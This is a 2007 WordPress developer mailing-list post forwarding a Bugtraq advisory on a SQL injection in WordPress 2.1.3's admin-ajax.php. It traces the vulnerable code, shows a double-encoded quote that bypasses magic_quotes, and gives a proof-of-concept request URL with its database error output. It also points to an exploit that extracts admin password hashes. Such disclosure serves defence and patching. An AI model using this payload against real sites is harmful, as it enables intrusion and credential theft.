[wp-hackers] [Fwd: [waraxe-2007-SA#050] - Sql Injection in WordPress 2.1.3]

Robin Adrianse robin.adr at gmail.com
Tue May 22 19:19:31 GMT 2007 

It's already been sent to the list:
http://groups.google.com/group/wp-hackers/browse_thread/thread/42d44bc9f712920a

On 5/22/07, Bas Bosman <wordpress at nazgul.nu> wrote:
>
> Hi,
>
> FYI. This was just posted by somebody on the Bugtraq mailing list.
>
> Greetings,
> Bas Bosman (Nazgul)
>
>
>
> ---------------------------- Original Message ----------------------------
> Subject: [waraxe-2007-SA#050] - Sql Injection in WordPress 2.1.3
> From:    come2waraxe at yahoo.com
> Date:    Mon, May 21, 2007 14:20
> To:      bugtraq at securityfocus.com
> --------------------------------------------------------------------------
>
>
>
> [waraxe-2007-SA#050] - Sql Injection in WordPress 2.1.3
> ====================================================================
>
> Author: Janek Vind "waraxe"
> Date: 21. May 2007
> Location: Estonia, Tartu
> Web: http://www.waraxe.us/advisory-50.html
>
>
> Target software description:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> Vulnerable: WordPress 2.1.3
> Patched: WordPress 2.2
>
> http://www.wordpress.org/
>
>
> Vulnerabilities:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> 1. critical sql injection in "admin-ajax.php"
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> Let's have look @ source code of "wp-admin/admin-ajax.php" ~ line 6:
>
> ------------------[source code]----------------------
> define('DOING_AJAX', true);
>
> check_ajax_referer();
> if ( !is_user_logged_in() )
>         die('-1');
> ------------------[/source code]----------------------
>
> Now let's take a peek at "check_ajax_referer()"
>
> ------------------[source code]----------------------
> function check_ajax_referer() {
>         $cookie = explode('; ', urldecode(empty($_POST['cookie']) ?
> $_GET['cookie'] : $_POST['cookie'])); // AJAX scripts must pass
> cookie=document.cookie
>         foreach ( $cookie as $tasty ) {
>                 if ( false !== strpos($tasty, USER_COOKIE) )
>                         $user = substr(strstr($tasty, '='), 1);
>                 if ( false !== strpos($tasty, PASS_COOKIE) )
>                         $pass = substr(strstr($tasty, '='), 1);
>         }
>         if ( !wp_login( $user, $pass, true ) )
>                 die('-1');
> ------------------[/source code]----------------------
>
> We can see "urldecode()" in use ...
> So by using "%2527" we can deliver single quotes to "wp_login()",
> effectively bypassing php's "magic_quotes" feature!
>
> Hmm, let's proceed further:
>
>
> ------------------[source code]----------------------
> function wp_login($username, $password, $already_md5 = false) {
>         global $wpdb, $error;
> ...
>         $login = get_userdatabylogin($username);
> ------------------[/source code]----------------------
>
>
> And finally:
>
>
> ------------------[source code]----------------------
> function get_userdatabylogin($user_login) {
>         global $wpdb;
> ...
>         if ( !$user = $wpdb->get_row("SELECT * FROM $wpdb->users
> WHERE user_login = '$user_login'") )
>                 return false;
> ------------------[/source code]----------------------
>
> So really there seems to be exist sql injection possibility.
> Now it's time for some proof-of-concept fun :)
>
> ------------------[PoC test]-----------------------
> http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php?
> cookie=wordpressuser_5a136e6377f39b00c76957953df945db%253dx%2527gotcha
> ;+wordpresspass_5a136e6377f39b00c76957953df945db%253dx
> ------------------[/PoC test]----------------------
>
> ... and if WordPress sql error feedback is enabled, then we can see nice
> error message:
>
> WordPress database error: [You have an error in your SQL syntax;
> check the manual that corresponds to your MySQL server version for the
> right syntax to use near 'gotcha'' at line 1]
>
> SELECT * FROM wp_users WHERE user_login = 'x'gotcha'
>
> Yeah, it works!! But before testing that PoC cookie suffix must be changed
> to currently valid. Here is how it goes:
>
> Example target is:
> http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php Base url for
> WordPress installation is: http://localhost/wordpress.2.1.3 And suffix is:
>
> md5('http://localhost/wordpress.2.1.3') =
> '5a136e6377f39b00c76957953df945db'
>
> And final variable names:
>
> wordpressuser_5a136e6377f39b00c76957953df945db
> wordpresspass_5a136e6377f39b00c76957953df945db
>
> One more time: for every target must be calculated specific suffix!
>
> OK, now about exploiting ...
>
> It seems that blind fishing is only method for this security hole. There
> is exploit, I have written in php, which will retrieve from database
> WordPress admin password md5 hash within few minutes.
>
> Get it from here:
>
> http://www.waraxe.us/ftopict-1776.html
>
>
> //-----> See ya soon and have a nice day ;) <-----//
>
>
> How to fix:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> WordPress newest version 2.2 is immune against this sql injection. So -->
> http://wordpress.org/download/  <-- update it NOW!
>
>
> Greetings:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> Greets to LINUX, Heintz, slimjim100, shai-tan, y3dips, Sm0ke, Chb  and all
> other people who know me!
>
> Special greets goes to Raido Kerna.
>
> Tervitusi Torufoorumi rahvale!
>
> Contact:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> come2waraxe at yahoo.com
> Janek Vind "waraxe"
>
> Homepage: http://www.waraxe.us/
>
>
> Shameless advertise:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> Axing url for easy use - http://urlaxe.com/
> All about sql injections - http://sqlaxe.com/
>
> ---------------------------------- [ EOF ]
> ------------------------------------
>
>
>
>
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>

More information about the wp-hackers mailing list